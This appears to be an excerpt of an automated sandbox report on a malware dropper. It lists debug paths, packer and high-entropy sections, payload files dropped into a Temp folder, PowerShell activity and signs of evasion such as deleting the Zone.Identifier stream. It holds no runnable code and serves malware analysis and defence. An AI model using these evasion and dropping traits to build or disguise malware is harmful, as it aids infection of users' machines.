                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Static file information: File size 3545603 > 1048576
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.00000000018D4000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbeH source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.0000000001895000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\neyicuyim\povig_bum_j.pdbpEp source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000000.1719311767.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Mon179e1058f256.exe.1.dr
                  Source: Binary string: -C:\wuye\yajiwixifava\jayawoduta_jeyifucanor\kuhitoguzepuwu\bi.pdbpE source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000000.1716147888.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Mon1785436ae78.exe.1.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17e1fac3fd3d84b.exe, 00000015.00000002.1815283502.0000000000118000.00000002.00000001.01000000.00000010.sdmp, Mon17e1fac3fd3d84b.exe, 00000015.00000000.1712134912.0000000000118000.00000002.00000001.01000000.00000010.sdmp, 09xU.exE, 00000026.00000000.1793041267.0000000000748000.00000002.00000001.01000000.00000020.sdmp, 09xU.exE, 00000026.00000002.1956857652.0000000000748000.00000002.00000001.01000000.00000020.sdmp, Mon17e1fac3fd3d84b.exe.1.dr
                  Source: Binary string: em.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BDD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4146627363.0000000000194000.00000004.00000010.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4147052566.00000000008F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\neyicuyim\povig_bum_j.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000000.1719311767.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Mon179e1058f256.exe.1.dr
                  Source: Binary string: C:\projects\controlzex\src\ControlzEx\obj\Release\NET45\ControlzEx.pdbL source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr
                  Source: Binary string: C:\tabosamifoma60\cukatopeh.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17f45359eb9.exe, 00000018.00000002.1984751493.0000000000409000.00000020.00000001.01000000.00000014.sdmp, Mon17f45359eb9.exe, 00000018.00000000.1714843560.0000000000401000.00000020.00000001.01000000.00000014.sdmp, bgjifes.47.dr, Mon17f45359eb9.exe.1.dr
                  Source: Binary string: ?C:\tabosamifoma60\cukatopeh.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17f45359eb9.exe, 00000018.00000002.1984751493.0000000000409000.00000020.00000001.01000000.00000014.sdmp, Mon17f45359eb9.exe, 00000018.00000000.1714843560.0000000000401000.00000020.00000001.01000000.00000014.sdmp, bgjifes.47.dr, Mon17f45359eb9.exe.1.dr
                  Source: Binary string: System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\wuye\yajiwixifava\jayawoduta_jeyifucanor\kuhitoguzepuwu\bi.pdb source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000000.1716147888.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Mon1785436ae78.exe.1.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbtZrq source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb3t source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.0000000001895000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\projects\controlzex\src\ControlzEx\obj\Release\NET45\ControlzEx.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe Unpacked PE file: 24.2.Mon17f45359eb9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Unpacked PE file: 26.2.Mon1785436ae78.exe.400000.0.unpack .text:ER;.data:W;.tls:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe Unpacked PE file: 29.2.Mon179e1058f256.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Unpacked PE file: 26.2.Mon1785436ae78.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe Unpacked PE file: 29.2.Mon179e1058f256.exe.400000.0.unpack
                  Source: Mon17948100733a95c58.exe.1.dr Static PE information: 0xCF57F66C [Tue Mar 26 03:13:48 2080 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_004014E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004014E0
                  Source: initial sample Static PE information: section where entry point is pointing to: .aspack
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5581953
                  Source: setup_installer.exe.0.dr Static PE information: section name: .sxdata
                  Source: Mon1795d04d4bd.exe.1.dr Static PE information: section name: [$vdPf#
                  Source: Mon1795d04d4bd.exe.1.dr Static PE information: section name:
                  Source: Mon17c604381c7047e.exe.1.dr Static PE information: section name: _RDATA
                  Source: Mon17e1fac3fd3d84b.exe.1.dr Static PE information: section name: .didat
                  Source: setup_install.exe.1.dr Static PE information: section name: /4
                  Source: setup_install.exe.1.dr Static PE information: section name: /14
                  Source: setup_install.exe.1.dr Static PE information: section name: /29
                  Source: setup_install.exe.1.dr Static PE information: section name: /41
                  Source: setup_install.exe.1.dr Static PE information: section name: /55
                  Source: setup_install.exe.1.dr Static PE information: section name: /67
                  Source: setup_install.exe.1.dr Static PE information: section name: /80
                  Source: setup_install.exe.1.dr Static PE information: section name: /91
                  Source: setup_install.exe.1.dr Static PE information: section name: /102
                  Source: libcurl.dll.1.dr Static PE information: section name: /4
                  Source: libcurl.dll.1.dr Static PE information: section name: /14
                  Source: libcurl.dll.1.dr Static PE information: section name: /29
                  Source: libcurl.dll.1.dr Static PE information: section name: /41
                  Source: libcurl.dll.1.dr Static PE information: section name: /55
                  Source: libcurl.dll.1.dr Static PE information: section name: /67
                  Source: libcurl.dll.1.dr Static PE information: section name: /80
                  Source: libcurl.dll.1.dr Static PE information: section name: .aspack
                  Source: libcurl.dll.1.dr Static PE information: section name: .adata
                  Source: libcurlpp.dll.1.dr Static PE information: section name: /4
                  Source: libcurlpp.dll.1.dr Static PE information: section name: /14
                  Source: libcurlpp.dll.1.dr Static PE information: section name: /29
                  Source: libcurlpp.dll.1.dr Static PE information: section name: /41
                  Source: libcurlpp.dll.1.dr Static PE information: section name: /55
                  Source: libcurlpp.dll.1.dr Static PE information: section name: /67
                  Source: libcurlpp.dll.1.dr Static PE information: section name: /80
                  Source: libcurlpp.dll.1.dr Static PE information: section name: .aspack
                  Source: libcurlpp.dll.1.dr Static PE information: section name: .adata
                  Source: libgcc_s_dw2-1.dll.1.dr Static PE information: section name: /4
                  Source: libstdc++-6.dll.1.dr Static PE information: section name: /4
                  Source: libstdc++-6.dll.1.dr Static PE information: section name: .aspack
                  Source: libstdc++-6.dll.1.dr Static PE information: section name: .adata
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe Code function: 1_3_01F37DE6 push eax; ret 1_3_01F37DE7
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe Code function: 1_3_01F36208 push cs; iretd 1_3_01F3633C
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe Code function: 1_2_00414150 push ecx; mov dword ptr [esp], ecx 1_2_00414151
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe Code function: 1_2_00418D80 push eax; ret 1_2_00418D9E
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe Code function: 1_2_00418DB0 push eax; ret 1_2_00418DDE
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0044A019 push eax; mov dword ptr [esp], ebx 2_2_0044A02D
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_004829B0 push eax; mov dword ptr [esp], esi 2_2_004983CD
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0046808D push eax; mov dword ptr [esp], ebx 2_2_004680B2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_00468089 push eax; mov dword ptr [esp], ebx 2_2_004680B2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_004561ED push ecx; mov dword ptr [esp], ebx 2_2_00456219
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_004561F1 push ecx; mov dword ptr [esp], ebx 2_2_00456219
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_00454257 push ecx; mov dword ptr [esp], ebx 2_2_00454281
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0045425E push ecx; mov dword ptr [esp], ebx 2_2_00454281
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0046A276 push edx; mov dword ptr [esp], ebx 2_2_0046A295
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0046A276 push eax; mov dword ptr [esp], ebx 2_2_0046A2BF
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0046A27A push eax; mov dword ptr [esp], ebx 2_2_0046A2BF
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0046828D push eax; mov dword ptr [esp], ebx 2_2_004682B2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_00446289 push edx; mov dword ptr [esp], ebx 2_2_0044629D
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_00468289 push eax; mov dword ptr [esp], ebx 2_2_004682B2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_00458353 push eax; mov dword ptr [esp], ebx 2_2_00458376
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0045638F push eax; mov dword ptr [esp], ebx 2_2_004563A3
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0046842C push eax; mov dword ptr [esp], ebx 2_2_0046843D
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_004484A3 push edx; mov dword ptr [esp], ebx 2_2_004484B7
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_004564AC push eax; mov dword ptr [esp], ebx 2_2_004564BD
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0046854C push eax; mov dword ptr [esp], ebx 2_2_0046855D
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_0043E5A5 push edx; mov dword ptr [esp], ebx 2_2_0043E5B9
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Code function: 2_2_00466605 push eax; mov dword ptr [esp], ebx 2_2_00466619
                  Source: Mon1795d04d4bd.exe.1.dr Static PE information: section name: [$vdPf# entropy: 7.993605537305936
                  Source: Mon179e1058f256.exe.1.dr Static PE information: section name: .text entropy: 7.195438472644511
                  Source: Mon17f45359eb9.exe.1.dr Static PE information: section name: .text entropy: 6.9499836708304565
                  Source: libcurl.dll.1.dr Static PE information: section name: .text entropy: 7.9981464299375755
                  Source: libcurlpp.dll.1.dr Static PE information: section name: .text entropy: 7.921841635096203
                  Source: libstdc++-6.dll.1.dr Static PE information: section name: .text entropy: 7.998669633840856
                  Source: Mon1785436ae78.exe.1.dr Static PE information: section name: .text entropy: 7.381763160372711
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe
                  Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\09xU.exE
                  Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\bgjifes
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe File created: C:\Users\user\AppData\Local\Temp\setup_installer.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dll
                  Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\r6f7sE.I
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libgcc_s_dw2-1.dll
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurl.dll
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libwinpthread-1.dll
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe File created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\bgjifes:Zone.Identifier read attributes | delete
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess information set: NOOPENFILEERRORBOX
